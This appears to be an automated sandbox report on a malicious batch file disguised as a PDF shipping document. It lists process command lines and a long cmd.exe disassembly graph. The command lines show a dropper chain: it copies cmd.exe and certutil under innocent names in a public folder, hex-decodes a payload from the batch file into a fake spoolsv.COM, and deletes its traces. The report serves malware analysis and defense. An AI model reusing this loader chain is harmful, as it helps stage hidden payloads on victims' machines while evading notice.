                                      Click to dive into process behavior distribution

                                      Behavior

                                      Click to jump to process

                                      System Behavior

                                      General

                                      Target ID:0
                                      Start time:07:23:08
                                      Start date:05/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\1x40 CONTAINER.PDF-.bat" "
                                      Imagebase:0x7ff6b84e0000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:1
                                      Start time:07:23:08
                                      Start date:05/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff75da10000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:3
                                      Start time:07:23:09
                                      Start date:05/12/2024
                                      Path:C:\Windows\System32\extrac32.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
                                      Imagebase:0x7ff7b5ef0000
                                      File size:35'328 bytes
                                      MD5 hash:41330D97BF17D07CD4308264F3032547
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      General

                                      Target ID:4
                                      Start time:07:23:09
                                      Start date:05/12/2024
                                      Path:C:\Users\Public\alpha.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                      Imagebase:0x7ff7cd480000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 0%, ReversingLabs
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:5
                                      Start time:07:23:09
                                      Start date:05/12/2024
                                      Path:C:\Windows\System32\extrac32.exe
                                      Wow64 process (32bit):false
                                      Commandline:extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                      Imagebase:0x7ff7b5ef0000
                                      File size:35'328 bytes
                                      MD5 hash:41330D97BF17D07CD4308264F3032547
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      General

                                      Target ID:6
                                      Start time:07:23:09
                                      Start date:05/12/2024
                                      Path:C:\Users\Public\alpha.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\1x40 CONTAINER.PDF-.bat" "C:\\Users\\Public\\spoolsv.MPEG" 9
                                      Imagebase:0x7ff7cd480000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:7
                                      Start time:07:23:09
                                      Start date:05/12/2024
                                      Path:C:\Users\Public\kn.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\1x40 CONTAINER.PDF-.bat" "C:\\Users\\Public\\spoolsv.MPEG" 9
                                      Imagebase:0x7ff6aa1e0000
                                      File size:1'651'712 bytes
                                      MD5 hash:F17616EC0522FC5633151F7CAA278CAA
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 0%, ReversingLabs
                                      Reputation:moderate
                                      Has exited:true

                                      General

                                      Target ID:8
                                      Start time:07:23:10
                                      Start date:05/12/2024
                                      Path:C:\Users\Public\alpha.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\spoolsv.MPEG" "C:\\Users\\Public\\Libraries\\spoolsv.COM" 12
                                      Imagebase:0x7ff7cd480000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:9
                                      Start time:07:23:10
                                      Start date:05/12/2024
                                      Path:C:\Users\Public\kn.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\spoolsv.MPEG" "C:\\Users\\Public\\Libraries\\spoolsv.COM" 12
                                      Imagebase:0x7ff6aa1e0000
                                      File size:1'651'712 bytes
                                      MD5 hash:F17616EC0522FC5633151F7CAA278CAA
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      General

                                      Target ID:10
                                      Start time:07:23:10
                                      Start date:05/12/2024
                                      Path:C:\Users\Public\alpha.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
                                      Imagebase:0x7ff7cd480000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:11
                                      Start time:07:23:11
                                      Start date:05/12/2024
                                      Path:C:\Users\Public\alpha.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\spoolsv.MPEG" / A / F / Q / S
                                      Imagebase:0x7ff7cd480000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Disassembly

                                      Reset < >

                                        Execution Graph

                                        Execution Coverage:5.5%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:31.6%
                                        Total number of Nodes:620
                                        Total number of Limit Nodes:22
                                        execution_graph 16777 7ff7cd49416f 16778 7ff7cd49412e 16777->16778 16781 7ff7cd498f80 16778->16781 16782 7ff7cd498f89 16781->16782 16783 7ff7cd49413e 16782->16783 16784 7ff7cd498fe0 RtlCaptureContext RtlLookupFunctionEntry 16782->16784 16785 7ff7cd499025 RtlVirtualUnwind 16784->16785 16786 7ff7cd499067 16784->16786 16785->16786 16789 7ff7cd498fa4 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 16786->16789 16723 7ff7cd498d80 16724 7ff7cd498da4 16723->16724 16725 7ff7cd498db6 16724->16725 16726 7ff7cd498dbf Sleep 16724->16726 16727 7ff7cd498ddb _amsg_exit 16725->16727 16728 7ff7cd498de7 16725->16728 16726->16724 16727->16728 16729 7ff7cd498e56 _initterm 16728->16729 16730 7ff7cd498e73 _IsNonwritableInCurrentImage 16728->16730 16731 7ff7cd498e3c 16728->16731 16729->16730 16737 7ff7cd4937d8 GetCurrentThreadId OpenThread 16730->16737 16770 7ff7cd4904f4 16737->16770 16739 7ff7cd493839 HeapSetInformation RegOpenKeyExW 16740 7ff7cd49e9f8 RegQueryValueExW RegCloseKey 16739->16740 16741 7ff7cd49388d 16739->16741 16743 7ff7cd49ea41 GetThreadLocale 16740->16743 16742 7ff7cd495920 VirtualQuery VirtualQuery 16741->16742 16744 7ff7cd4938ab GetConsoleOutputCP GetCPInfo 16742->16744 16752 7ff7cd493919 16743->16752 16744->16743 16745 7ff7cd4938f1 memset 16744->16745 16745->16752 16746 7ff7cd494d5c 391 API calls 16746->16752 16747 7ff7cd49eb27 _setjmp 16747->16752 16748 7ff7cd493948 _setjmp 16748->16752 16749 7ff7cd483240 166 API calls 16749->16752 16750 7ff7cd4a8530 370 API calls 16750->16752 16751 7ff7cd4901b8 6 API calls 16751->16752 16752->16740 16752->16746 16752->16747 16752->16748 16752->16749 16752->16750 16752->16751 16753 7ff7cd494c1c 166 API calls 16752->16753 16754 7ff7cd48df60 481 API calls 16752->16754 16755 7ff7cd49eb71 _setmode 16752->16755 16756 7ff7cd4986f0 182 API calls 16752->16756 16757 7ff7cd490580 12 API calls 16752->16757 16759 7ff7cd4958e4 EnterCriticalSection LeaveCriticalSection 16752->16759 16761 7ff7cd48be00 647 API calls 16752->16761 16762 7ff7cd4958e4 EnterCriticalSection LeaveCriticalSection 16752->16762 16753->16752 16754->16752 16755->16752 16756->16752 16758 7ff7cd49398b GetConsoleOutputCP GetCPInfo 16757->16758 16760 7ff7cd4904f4 GetModuleHandleW GetProcAddress SetThreadLocale 16758->16760 16759->16752 16760->16752 16761->16752 16763 7ff7cd49ebbe GetConsoleOutputCP GetCPInfo 16762->16763 16764 7ff7cd4904f4 GetModuleHandleW GetProcAddress SetThreadLocale 16763->16764 16765 7ff7cd49ebe6 16764->16765 16766 7ff7cd48be00 647 API calls 16765->16766 16767 7ff7cd490580 12 API calls 16765->16767 16766->16765 16768 7ff7cd49ebfc GetConsoleOutputCP GetCPInfo 16767->16768 16769 7ff7cd4904f4 GetModuleHandleW GetProcAddress SetThreadLocale 16768->16769 16769->16752 16771 7ff7cd490504 16770->16771 16772 7ff7cd49051e GetModuleHandleW 16771->16772 16773 7ff7cd49054d GetProcAddress 16771->16773 16774 7ff7cd49056c SetThreadLocale 16771->16774 16772->16771 16773->16771 16776 7ff7cd498d30 __getmainargs 21927 7ff7cd48b3f0 21928 7ff7cd48b41a 21927->21928 21929 7ff7cd49c2a3 iswdigit 21928->21929 21932 7ff7cd48b42f 21928->21932 21929->21928 21930 7ff7cd49c2b7 21929->21930 21931 7ff7cd483278 166 API calls 21930->21931 21933 7ff7cd48b461 21931->21933 21935 7ff7cd48be00 21932->21935 21936 7ff7cd48be1b 21935->21936 21946 7ff7cd48bec8 21935->21946 21937 7ff7cd48be47 memset 21936->21937 21938 7ff7cd48be67 21936->21938 21936->21946 22042 7ff7cd48bff0 21937->22042 21940 7ff7cd48bf29 21938->21940 21941 7ff7cd48be73 21938->21941 21947 7ff7cd48beaf 21938->21947 21943 7ff7cd48cd90 166 API calls 21940->21943 21942 7ff7cd48be92 21941->21942 21944 7ff7cd48bf0c 21941->21944 21952 7ff7cd48bea1 21942->21952 21969 7ff7cd48c620 GetConsoleTitleW 21942->21969 21948 7ff7cd48bf33 21943->21948 22080 7ff7cd48b0d8 memset 21944->22080 21946->21933 21947->21946 21950 7ff7cd48bff0 185 API calls 21947->21950 21948->21947 21953 7ff7cd48bf70 21948->21953 21956 7ff7cd4888a8 _wcsicmp 21948->21956 21950->21946 21952->21947 21958 7ff7cd48af98 2 API calls 21952->21958 21963 7ff7cd48bf75 21953->21963 22140 7ff7cd4871ec 21953->22140 21954 7ff7cd48bf1e 21954->21947 21957 7ff7cd48bf5a 21956->21957 21957->21953 21960 7ff7cd490a6c 273 API calls 21957->21960 21958->21947 21959 7ff7cd48bfa9 21959->21947 21961 7ff7cd48cd90 166 API calls 21959->21961 21960->21953 21962 7ff7cd48bfbb 21961->21962 21962->21947 21964 7ff7cd49081c 166 API calls 21962->21964 21965 7ff7cd48b0d8 194 API calls 21963->21965 21964->21963 21966 7ff7cd48bf7f 21965->21966 21966->21947 22013 7ff7cd495ad8 21966->22013 21971 7ff7cd48c675 21969->21971 21976 7ff7cd48ca2f 21969->21976 21970 7ff7cd49c5fc GetLastError 21970->21976 21972 7ff7cd48ca40 17 API calls 21971->21972 21982 7ff7cd48c69b 21972->21982 21973 7ff7cd483278 166 API calls 21973->21976 21974 7ff7cd49855c ??_V@YAXPEAX 21974->21976 21975 7ff7cd49291c 8 API calls 22000 7ff7cd48c762 21975->22000 21976->21970 21976->21973 21976->21974 21977 7ff7cd48c9b5 21980 7ff7cd49855c ??_V@YAXPEAX 21977->21980 21978 7ff7cd4889c0 23 API calls 22006 7ff7cd48c964 21978->22006 21979 7ff7cd49855c ??_V@YAXPEAX 21979->22000 22001 7ff7cd48c855 21980->22001 21981 7ff7cd48c978 towupper 21981->22006 21982->21976 21982->21977 21983 7ff7cd48d3f0 223 API calls 21982->21983 21982->22000 21984 7ff7cd48c741 21983->21984 21987 7ff7cd48c74d 21984->21987 21991 7ff7cd48c8b5 wcsncmp 21984->21991 21985 7ff7cd48c872 21988 7ff7cd49855c ??_V@YAXPEAX 21985->21988 21986 7ff7cd4aec14 173 API calls 21986->22000 21992 7ff7cd48bd38 207 API calls 21987->21992 21987->22000 21990 7ff7cd48c87c 21988->21990 21989 7ff7cd49c6b8 SetConsoleTitleW 21989->21985 21993 7ff7cd498f80 7 API calls 21990->21993 21991->21987 21991->22000 21992->22000 21995 7ff7cd48c88e 21993->21995 21994 7ff7cd48c83d 22146 7ff7cd48cb40 21994->22146 21995->21952 21997 7ff7cd48c78a wcschr 21997->22000 21999 7ff7cd48ca25 22003 7ff7cd483278 166 API calls 21999->22003 22000->21975 22000->21976 22000->21979 22000->21994 22000->21997 22000->21999 22000->22000 22004 7ff7cd49c684 22000->22004 22000->22006 22007 7ff7cd48ca2a 22000->22007 22001->21985 22001->21989 22003->21976 22005 7ff7cd483278 166 API calls 22004->22005 22005->21976 22006->21970 22006->21977 22006->21978 22006->21981 22006->21986 22006->22000 22009 7ff7cd48ca16 GetLastError 22006->22009 22008 7ff7cd499158 7 API calls 22007->22008 22008->21976 22011 7ff7cd483278 166 API calls 22009->22011 22012 7ff7cd49c675 22011->22012 22012->21976 22014 7ff7cd48cd90 166 API calls 22013->22014 22015 7ff7cd495b12 22014->22015 22016 7ff7cd495b8b 22015->22016 22017 7ff7cd48cb40 166 API calls 22015->22017 22018 7ff7cd498f80 7 API calls 22016->22018 22019 7ff7cd495b26 22017->22019 22020 7ff7cd48bf99 22018->22020 22019->22016 22021 7ff7cd490a6c 273 API calls 22019->22021 22020->21952 22022 7ff7cd495b43 22021->22022 22023 7ff7cd495bb8 22022->22023 22024 7ff7cd495b48 GetConsoleTitleW 22022->22024 22025 7ff7cd495bf4 22023->22025 22026 7ff7cd495bbd GetConsoleTitleW 22023->22026 22027 7ff7cd48cad4 172 API calls 22024->22027 22028 7ff7cd49f452 22025->22028 22029 7ff7cd495bfd 22025->22029 22031 7ff7cd48cad4 172 API calls 22026->22031 22030 7ff7cd495b66 22027->22030 22033 7ff7cd493c24 166 API calls 22028->22033 22029->22016 22035 7ff7cd49f462 22029->22035 22036 7ff7cd495c1b 22029->22036 22162 7ff7cd494224 InitializeProcThreadAttributeList 22030->22162 22034 7ff7cd495bdb 22031->22034 22033->22016 22222 7ff7cd4896e8 22034->22222 22040 7ff7cd483278 166 API calls 22035->22040 22039 7ff7cd483278 166 API calls 22036->22039 22037 7ff7cd495b7f 22041 7ff7cd495c3c SetConsoleTitleW 22037->22041 22039->22016 22040->22016 22041->22016 22043 7ff7cd48c01c 22042->22043 22046 7ff7cd48c0c4 22042->22046 22044 7ff7cd48c022 22043->22044 22045 7ff7cd48c086 22043->22045 22047 7ff7cd48c030 22044->22047 22048 7ff7cd48c113 22044->22048 22050 7ff7cd48c144 22045->22050 22061 7ff7cd48c094 22045->22061 22046->21938 22049 7ff7cd48c039 wcschr 22047->22049 22063 7ff7cd48c053 22047->22063 22059 7ff7cd48ff70 2 API calls 22048->22059 22048->22063 22052 7ff7cd48c301 22049->22052 22049->22063 22051 7ff7cd48c151 22050->22051 22069 7ff7cd48c1c8 22050->22069 22428 7ff7cd48c460 22051->22428 22058 7ff7cd48cd90 166 API calls 22052->22058 22053 7ff7cd48c0c6 22057 7ff7cd48c0cf wcschr 22053->22057 22067 7ff7cd48c073 22053->22067 22054 7ff7cd48c058 22064 7ff7cd48ff70 2 API calls 22054->22064 22054->22067 22056 7ff7cd48c460 183 API calls 22056->22061 22062 7ff7cd48c1be 22057->22062 22057->22067 22079 7ff7cd48c30b 22058->22079 22059->22063 22061->22046 22061->22056 22065 7ff7cd48cd90 166 API calls 22062->22065 22063->22053 22063->22054 22071 7ff7cd48c211 22063->22071 22064->22067 22065->22069 22066 7ff7cd48c460 183 API calls 22066->22046 22067->22046 22068 7ff7cd48c460 183 API calls 22067->22068 22068->22067 22069->22046 22070 7ff7cd48c285 22069->22070 22069->22071 22076 7ff7cd48d840 178 API calls 22069->22076 22070->22071 22075 7ff7cd48b6b0 170 API calls 22070->22075 22074 7ff7cd48ff70 2 API calls 22071->22074 22072 7ff7cd48b6b0 170 API calls 22072->22063 22073 7ff7cd48d840 178 API calls 22073->22079 22074->22046 22077 7ff7cd48c2ac 22075->22077 22076->22069 22077->22067 22077->22071 22078 7ff7cd48c3d4 22078->22067 22078->22071 22078->22072 22079->22046 22079->22071 22079->22073 22079->22078 22081 7ff7cd48ca40 17 API calls 22080->22081 22089 7ff7cd48b162 22081->22089 22082 7ff7cd48b303 22085 7ff7cd498f80 7 API calls 22082->22085 22083 7ff7cd48b2f7 ??_V@YAXPEAX 22083->22082 22084 7ff7cd48b1d9 22088 7ff7cd48cd90 166 API calls 22084->22088 22111 7ff7cd48b1ed 22084->22111 22087 7ff7cd48b315 22085->22087 22086 7ff7cd491ea0 8 API calls 22086->22089 22087->21942 22087->21954 22088->22111 22089->22084 22089->22086 22110 7ff7cd48b2e1 22089->22110 22091 7ff7cd48b228 _get_osfhandle 22095 7ff7cd48b23f _get_osfhandle 22091->22095 22091->22111 22092 7ff7cd49bfef _get_osfhandle SetFilePointer 22093 7ff7cd49c01d 22092->22093 22092->22111 22096 7ff7cd4933f0 _vsnwprintf 22093->22096 22095->22111 22097 7ff7cd49c038 22096->22097 22103 7ff7cd483278 166 API calls 22097->22103 22098 7ff7cd49c1c3 22102 7ff7cd4933f0 _vsnwprintf 22098->22102 22099 7ff7cd4901b8 6 API calls 22099->22111 22100 7ff7cd48d208 _close 22100->22111 22101 7ff7cd4926e0 19 API calls 22101->22111 22102->22097 22104 7ff7cd49c1f9 22103->22104 22106 7ff7cd48af98 2 API calls 22104->22106 22105 7ff7cd49c060 22108 7ff7cd49c246 22105->22108 22113 7ff7cd4909f4 2 API calls 22105->22113 22106->22110 22107 7ff7cd48b038 _dup2 22107->22111 22114 7ff7cd48af98 2 API calls 22108->22114 22109 7ff7cd49c1a5 22112 7ff7cd48b038 _dup2 22109->22112 22110->22082 22110->22083 22111->22091 22111->22092 22111->22098 22111->22099 22111->22100 22111->22101 22111->22105 22111->22107 22111->22108 22111->22109 22111->22110 22116 7ff7cd48b356 22111->22116 22442 7ff7cd48affc _dup 22111->22442 22444 7ff7cd4af318 _get_osfhandle GetFileType 22111->22444 22117 7ff7cd49c1b7 22112->22117 22118 7ff7cd49c084 22113->22118 22115 7ff7cd49c24b 22114->22115 22119 7ff7cd4af1d8 166 API calls 22115->22119 22124 7ff7cd48af98 2 API calls 22116->22124 22120 7ff7cd49c207 22117->22120 22121 7ff7cd49c1be 22117->22121 22122 7ff7cd48b900 166 API calls 22118->22122 22119->22110 22123 7ff7cd48d208 _close 22120->22123 22125 7ff7cd48d208 _close 22121->22125 22126 7ff7cd49c08c 22122->22126 22123->22116 22127 7ff7cd49c211 22124->22127 22125->22098 22128 7ff7cd49c094 wcsrchr 22126->22128 22139 7ff7cd49c0ad 22126->22139 22129 7ff7cd4933f0 _vsnwprintf 22127->22129 22128->22139 22130 7ff7cd49c22c 22129->22130 22131 7ff7cd483278 166 API calls 22130->22131 22131->22110 22132 7ff7cd49c106 22134 7ff7cd48ff70 2 API calls 22132->22134 22133 7ff7cd49c0e0 _wcsnicmp 22133->22139 22135 7ff7cd49c13b 22134->22135 22135->22108 22136 7ff7cd49c146 SearchPathW 22135->22136 22136->22108 22137 7ff7cd49c188 22136->22137 22138 7ff7cd4926e0 19 API calls 22137->22138 22138->22109 22139->22132 22139->22133 22141 7ff7cd487279 22140->22141 22142 7ff7cd487211 _setjmp 22140->22142 22141->21959 22142->22141 22144 7ff7cd487265 22142->22144 22445 7ff7cd4872b0 22144->22445 22147 7ff7cd48cb63 22146->22147 22148 7ff7cd48cd90 166 API calls 22147->22148 22149 7ff7cd48c848 22148->22149 22149->22001 22150 7ff7cd48cad4 22149->22150 22151 7ff7cd48cb05 22150->22151 22152 7ff7cd48cad9 22150->22152 22151->22001 22152->22151 22153 7ff7cd48cd90 166 API calls 22152->22153 22154 7ff7cd49c722 22153->22154 22154->22151 22155 7ff7cd49c72e GetConsoleTitleW 22154->22155 22155->22151 22156 7ff7cd49c74a 22155->22156 22157 7ff7cd48b6b0 170 API calls 22156->22157 22160 7ff7cd49c778 22157->22160 22158 7ff7cd49c7ec 22159 7ff7cd48ff70 2 API calls 22158->22159 22159->22151 22160->22158 22161 7ff7cd49c7dd SetConsoleTitleW 22160->22161 22161->22158 22163 7ff7cd49ecd4 GetLastError 22162->22163 22164 7ff7cd4942ab UpdateProcThreadAttribute 22162->22164 22169 7ff7cd49ecee 22163->22169 22165 7ff7cd49ecf0 GetLastError 22164->22165 22166 7ff7cd4942eb memset memset GetStartupInfoW 22164->22166 22259 7ff7cd4a9eec 22165->22259 22168 7ff7cd493a90 170 API calls 22166->22168 22171 7ff7cd4943a8 22168->22171 22172 7ff7cd48b900 166 API calls 22171->22172 22173 7ff7cd4943bb 22172->22173 22174 7ff7cd494638 _local_unwind 22173->22174 22175 7ff7cd4943cc 22173->22175 22174->22175 22176 7ff7cd494415 22175->22176 22177 7ff7cd4943de wcsrchr 22175->22177 22246 7ff7cd495a68 _get_osfhandle SetConsoleMode _get_osfhandle SetConsoleMode 22176->22246 22177->22176 22178 7ff7cd4943f7 lstrcmpW 22177->22178 22178->22176 22180 7ff7cd494668 22178->22180 22247 7ff7cd4a9044 22180->22247 22181 7ff7cd49441a 22183 7ff7cd49442a CreateProcessW 22181->22183 22185 7ff7cd494596 CreateProcessAsUserW 22181->22185 22184 7ff7cd49448b 22183->22184 22186 7ff7cd494672 GetLastError 22184->22186 22187 7ff7cd494495 CloseHandle 22184->22187 22185->22184 22200 7ff7cd49468d 22186->22200 22188 7ff7cd49498c 8 API calls 22187->22188 22189 7ff7cd4944c5 22188->22189 22192 7ff7cd4944cd 22189->22192 22189->22200 22190 7ff7cd4947a3 22190->22037 22191 7ff7cd4944f8 22191->22190 22193 7ff7cd494612 22191->22193 22195 7ff7cd495cb4 7 API calls 22191->22195 22192->22190 22192->22191 22211 7ff7cd4aa250 33 API calls 22192->22211 22196 7ff7cd49461c 22193->22196 22198 7ff7cd4947e1 CloseHandle 22193->22198 22194 7ff7cd48cd90 166 API calls 22197 7ff7cd494724 22194->22197 22199 7ff7cd494517 22195->22199 22202 7ff7cd48ff70 GetProcessHeap RtlFreeHeap 22196->22202 22201 7ff7cd49472c _local_unwind 22197->22201 22208 7ff7cd49473d 22197->22208 22198->22196 22203 7ff7cd4933f0 _vsnwprintf 22199->22203 22200->22192 22200->22194 22201->22208 22204 7ff7cd4947fa DeleteProcThreadAttributeList 22202->22204 22205 7ff7cd494544 22203->22205 22206 7ff7cd498f80 7 API calls 22204->22206 22207 7ff7cd49498c 8 API calls 22205->22207 22209 7ff7cd494820 22206->22209 22210 7ff7cd494558 22207->22210 22212 7ff7cd48ff70 GetProcessHeap RtlFreeHeap 22208->22212 22209->22037 22213 7ff7cd494564 22210->22213 22214 7ff7cd4947ae 22210->22214 22211->22191 22215 7ff7cd49475b _local_unwind 22212->22215 22216 7ff7cd49498c 8 API calls 22213->22216 22217 7ff7cd4933f0 _vsnwprintf 22214->22217 22215->22192 22218 7ff7cd494577 22216->22218 22217->22193 22218->22196 22219 7ff7cd49457f 22218->22219 22220 7ff7cd4aa920 210 API calls 22219->22220 22221 7ff7cd494584 22220->22221 22221->22196 22243 7ff7cd489737 22222->22243 22224 7ff7cd48cd90 166 API calls 22224->22243 22225 7ff7cd48977d memset 22226 7ff7cd48ca40 17 API calls 22225->22226 22226->22243 22227 7ff7cd49b76e 22229 7ff7cd483278 166 API calls 22227->22229 22228 7ff7cd49b7b3 22231 7ff7cd49b787 22229->22231 22230 7ff7cd49b79a 22233 7ff7cd49855c ??_V@YAXPEAX 22230->22233 22234 7ff7cd49b795 22231->22234 22235 7ff7cd4ae944 393 API calls 22231->22235 22232 7ff7cd48b364 17 API calls 22232->22243 22233->22228 22344 7ff7cd4a7694 22234->22344 22235->22234 22239 7ff7cd4896b4 186 API calls 22239->22243 22240 7ff7cd48986d 22241 7ff7cd489880 ??_V@YAXPEAX 22240->22241 22242 7ff7cd48988c 22240->22242 22241->22242 22244 7ff7cd498f80 7 API calls 22242->22244 22243->22224 22243->22225 22243->22227 22243->22228 22243->22230 22243->22232 22243->22239 22243->22240 22261 7ff7cd491fac memset 22243->22261 22288 7ff7cd48ce10 22243->22288 22338 7ff7cd495920 22243->22338 22245 7ff7cd48989d 22244->22245 22245->22037 22248 7ff7cd493a90 170 API calls 22247->22248 22249 7ff7cd4a9064 22248->22249 22250 7ff7cd4a9083 22249->22250 22251 7ff7cd4a906e 22249->22251 22253 7ff7cd48cd90 166 API calls 22250->22253 22252 7ff7cd49498c 8 API calls 22251->22252 22258 7ff7cd4a9081 22252->22258 22254 7ff7cd4a909b 22253->22254 22255 7ff7cd49498c 8 API calls 22254->22255 22254->22258 22256 7ff7cd4a90ec 22255->22256 22257 7ff7cd48ff70 2 API calls 22256->22257 22257->22258 22258->22176 22260 7ff7cd49ed0a DeleteProcThreadAttributeList 22259->22260 22260->22169 22263 7ff7cd49203b 22261->22263 22262 7ff7cd4920b0 22265 7ff7cd493060 171 API calls 22262->22265 22266 7ff7cd49211c 22262->22266 22263->22262 22264 7ff7cd492094 22263->22264 22267 7ff7cd4920a6 22264->22267 22268 7ff7cd483278 166 API calls 22264->22268 22265->22266 22266->22267 22269 7ff7cd492e44 2 API calls 22266->22269 22270 7ff7cd498f80 7 API calls 22267->22270 22268->22267 22272 7ff7cd492148 22269->22272 22271 7ff7cd492325 22270->22271 22271->22243 22272->22267 22273 7ff7cd492d70 3 API calls 22272->22273 22274 7ff7cd4921af 22273->22274 22275 7ff7cd48b900 166 API calls 22274->22275 22277 7ff7cd4921d0 22275->22277 22276 7ff7cd49e04a ??_V@YAXPEAX 22276->22267 22277->22276 22278 7ff7cd4922a4 ??_V@YAXPEAX 22277->22278 22279 7ff7cd49221c wcsspn 22277->22279 22278->22267 22281 7ff7cd48b900 166 API calls 22279->22281 22282 7ff7cd49223b 22281->22282 22282->22276 22285 7ff7cd492252 22282->22285 22283 7ff7cd49228f 22284 7ff7cd48d3f0 223 API calls 22283->22284 22284->22278 22285->22283 22286 7ff7cd49e06d wcschr 22285->22286 22287 7ff7cd49e090 towupper 22285->22287 22286->22285 22287->22283 22287->22285 22289 7ff7cd48d0f8 22288->22289 22308 7ff7cd48ce5b 22288->22308 22290 7ff7cd498f80 7 API calls 22289->22290 22292 7ff7cd48d10a 22290->22292 22291 7ff7cd49c860 22293 7ff7cd49c97c 22291->22293 22295 7ff7cd4aee88 390 API calls 22291->22295 22292->22243 22296 7ff7cd4ae9b4 197 API calls 22293->22296 22294 7ff7cd490494 182 API calls 22294->22308 22297 7ff7cd49c879 22295->22297 22298 7ff7cd49c981 longjmp 22296->22298 22299 7ff7cd49c882 EnterCriticalSection LeaveCriticalSection 22297->22299 22300 7ff7cd49c95c 22297->22300 22301 7ff7cd49c99a 22298->22301 22314 7ff7cd48d0e3 22299->22314 22300->22293 22304 7ff7cd4896b4 186 API calls 22300->22304 22301->22289 22303 7ff7cd49c9b3 ??_V@YAXPEAX 22301->22303 22303->22289 22304->22300 22305 7ff7cd48ceaa _tell 22307 7ff7cd48d208 _close 22305->22307 22306 7ff7cd48cd90 166 API calls 22306->22308 22307->22308 22308->22289 22308->22291 22308->22294 22308->22301 22308->22306 22309 7ff7cd49c9d5 22308->22309 22311 7ff7cd48b900 166 API calls 22308->22311 22308->22314 22318 7ff7cd48cf33 memset 22308->22318 22321 7ff7cd48ca40 17 API calls 22308->22321 22322 7ff7cd4abfec 176 API calls 22308->22322 22323 7ff7cd48d184 wcschr 22308->22323 22324 7ff7cd48d1a7 wcschr 22308->22324 22325 7ff7cd49c9c9 22308->22325 22327 7ff7cd4a778c 166 API calls 22308->22327 22328 7ff7cd490a6c 273 API calls 22308->22328 22329 7ff7cd48be00 635 API calls 22308->22329 22330 7ff7cd493448 166 API calls 22308->22330 22331 7ff7cd48cfab _wcsicmp 22308->22331 22332 7ff7cd490580 12 API calls 22308->22332 22336 7ff7cd491fac 238 API calls 22308->22336 22337 7ff7cd48d044 ??_V@YAXPEAX 22308->22337 22350 7ff7cd48df60 22308->22350 22370 7ff7cd4ac738 22308->22370 22310 7ff7cd4ad610 167 API calls 22309->22310 22312 7ff7cd49c9da 22310->22312 22311->22308 22313 7ff7cd49ca07 22312->22313 22316 7ff7cd4abfec 176 API calls 22312->22316 22315 7ff7cd4ae91c 198 API calls 22313->22315 22314->22243 22320 7ff7cd49ca0c 22315->22320 22317 7ff7cd49c9f1 22316->22317 22319 7ff7cd483240 166 API calls 22317->22319 22318->22308 22319->22313 22320->22243 22321->22308 22322->22308 22323->22308 22324->22308 22326 7ff7cd49855c ??_V@YAXPEAX 22325->22326 22326->22289 22327->22308 22328->22308 22329->22308 22330->22308 